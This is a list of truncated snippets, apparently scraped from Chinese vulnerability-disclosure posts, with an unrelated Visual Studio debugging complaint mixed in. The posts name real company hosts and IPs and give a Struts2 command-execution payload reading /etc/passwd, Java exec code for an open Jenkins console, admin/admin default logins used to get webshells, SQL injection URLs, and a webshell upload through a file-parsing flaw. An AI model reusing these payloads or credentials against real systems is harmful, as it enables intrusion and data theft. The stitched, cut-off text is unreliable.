网易某系统命令执行,经典Struts2漏洞复现,如下图: http://analytics.ws.netease.com/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,…
http://220.181.109.120:8080/ Jenkins平台,未授权访问,应该是奇艺的,看图: 还可以直接执行命令呢,继续深入的话可渗透内网(未授权不敢测试) Runtime runtime = Runtime.getRuntime(); Process process = runtime.exec("id"); process.getInputStream(); Buffered…
注入点: http://dota2db.games.sina.com.cn/?a=hero_info&id=10487
在安装完Visual Studio经常会遇到一个问题是,在打开IE或浏览网页的时候,都会出现iexplore.exe[XXXX]发生了未经处理的win32异常,还调Visual Studio用户要么启动实时调试,用户要么启动实时调试,要么忽略该异常.非常麻烦,网上也讲了好多解决办法,什么在visual studio(工具-选项-调试-实时-把右边那些本机\脚本\托管)这些钩都去掉等等,我试过了不还…
http://b131.demo.www.net.cn/admin/login.aspx 万网分销宝系统 用户名密码都是admin,进入后台可得shell ,如图 菜刀连接 同服很多分站,貌似都是测试模板
http://123.126.55.209:8000/ 新浪云主机托管平台SWS Service 用户名:admin 密码:admin 用火狐登陆进去可以点击查看相关信息,如图
1、SQL注入 http://minisite.163.com/2006/0615/abbott/page09.php?userID=209 ,如图 2、爆路径 3、列目录 http://cms.netease.com:9039/
问题出在百度地图LBS开放平台 http://bbs.lbsyun.baidu.com/ , 习惯性的在logo URL后面中上了/.php,见图 http://bbs.lbsyun.baidu.com/images/default/baidu_logo.gif/.php 并没有出现正常的“找不到文件”,而是直接爆出路径, 猜测应有解析漏洞,于是找个帖子上传个一句话图片马,Discuz 7.2的,…
原漏洞见 WooYun: 搜狐某分站struts配置不当,利用私有变量执行任意代码 按漏洞描述测试了下,确实未修复,见图: 执行了几个命令,感觉有些貌似没成功,于是用御剑扫了扫,有好几个旁站,就拿www.premedia.cn开刀吧 又见Fckeditor,而且该服务器已探测是IIS6.0 ,于是利用解析得shell 菜刀连接之 读取远程连接端口:19056,连接 发现已有前辈留有shift后门 …
新网的漏洞,去年就提交了一波(WooYun:新网漏洞大集合),但由于厂商原因给直接忽略了,好伤心的,今翻记事本又拾起,发现部分尚未有修复,整理如下: 1、主站存在FCKeditor 编辑器列目录漏洞,还有两分站也使用的FCKeditor 编辑器 http://www.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors…